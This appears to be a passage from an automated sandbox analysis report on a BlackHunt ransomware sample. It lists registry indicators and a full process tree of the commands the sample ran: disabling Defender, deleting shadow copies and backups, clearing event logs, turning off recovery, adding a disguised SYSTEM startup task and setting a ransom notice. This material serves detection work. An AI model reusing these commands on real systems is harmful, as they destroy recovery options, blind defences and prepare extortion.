db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 149 PID 2148 wrote to memory of 4592 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 149 PID 1176 wrote to memory of 1396 1176 cmd.exe 148 PID 1176 wrote to memory of 1396 1176 cmd.exe 148 PID 4748 wrote to memory of 1092 4748 cmd.exe 147 PID 4748 wrote to memory of 1092 4748 cmd.exe 147 PID 2256 wrote to memory of 552 2256 cmd.exe 146 PID 2256 wrote to memory of 552 2256 cmd.exe 146 PID 1952 wrote to memory of 1128 1952 cmd.exe 145 PID 1952 wrote to memory of 1128 1952 cmd.exe 145 PID 2148 wrote to memory of 2852 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 144 PID 2148 wrote to memory of 2852 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 144 PID 2148 wrote to memory of 1232 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 142 PID 2148 wrote to memory of 1232 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 142 PID 2700 wrote to memory of 3960 2700 cmd.exe 141 PID 2700 wrote to memory of 3960 2700 cmd.exe 141 PID 4592 wrote to memory of 2816 4592 cmd.exe 140 PID 4592 wrote to memory of 2816 4592 cmd.exe 140 PID 2148 wrote to memory of 2528 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 139 PID 2148 wrote to memory of 2528 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 139 PID 2148 wrote to memory of 4964 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 138 PID 2148 wrote to memory of 4964 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 138 PID 4148 wrote to memory of 4864 4148 cmd.exe 136 PID 4148 wrote to memory of 4864 4148 cmd.exe 136 PID 2852 wrote to memory of 3716 2852 cmd.exe 135 PID 2852 wrote to memory of 3716 2852 cmd.exe 135 PID 2148 wrote to memory of 2180 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 50 PID 2148 wrote to memory of 2180 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 50 PID 2148 wrote to memory of 3304 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 133 PID 2148 wrote to memory of 3304 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 133 PID 2528 wrote to memory of 3664 2528 cmd.exe 131 PID 2528 wrote to memory of 3664 2528 cmd.exe 131 PID 1232 wrote to memory of 5012 1232 cmd.exe 51 PID 1232 wrote to memory of 5012 1232 cmd.exe 51 PID 2148 wrote to memory of 4368 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 130 PID 2148 wrote to memory of 4368 2148 db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe 130 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe"C:\Users\Admin\AppData\Local\Temp\db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2148 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3960
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2180
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1152
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4748
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5972
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3148
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2204
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe" /F2⤵PID:2028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4136
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3100
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2528
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4956
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4684
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:14004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:14028
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:13956
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:13560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:12588
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:13692
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:13816
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:13484
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:13480
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:14392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:13432
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:13676
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:13784
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:7068
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5420
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:13336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:10436
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:12496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:5284
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:8652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11364
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:8480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:13768
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:5336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:13832
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:12572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:8388
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:8996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:8472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:8788
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:12216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:7764 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:11840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11840 -s 14524⤵
- Program crash
PID:8604
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe"2⤵PID:1052
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3512
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:4324
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:5012
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:5000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:1364
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:9036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:5632
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:6328
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6336
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:6344
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:4000
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:6528
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6672
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:6120
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:10448
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:5652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:5788
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\db6e9afa6d7eed242e326d34ea65aa5485cc2c90705f9f68541c85a77a1be531.exe" /F1⤵
- Creates scheduled task(s)
PID:5700
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:5628
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:10660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:4976
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:908
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:2984
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2096
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:4124
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:824
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:3664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:3716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:4864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2816
-
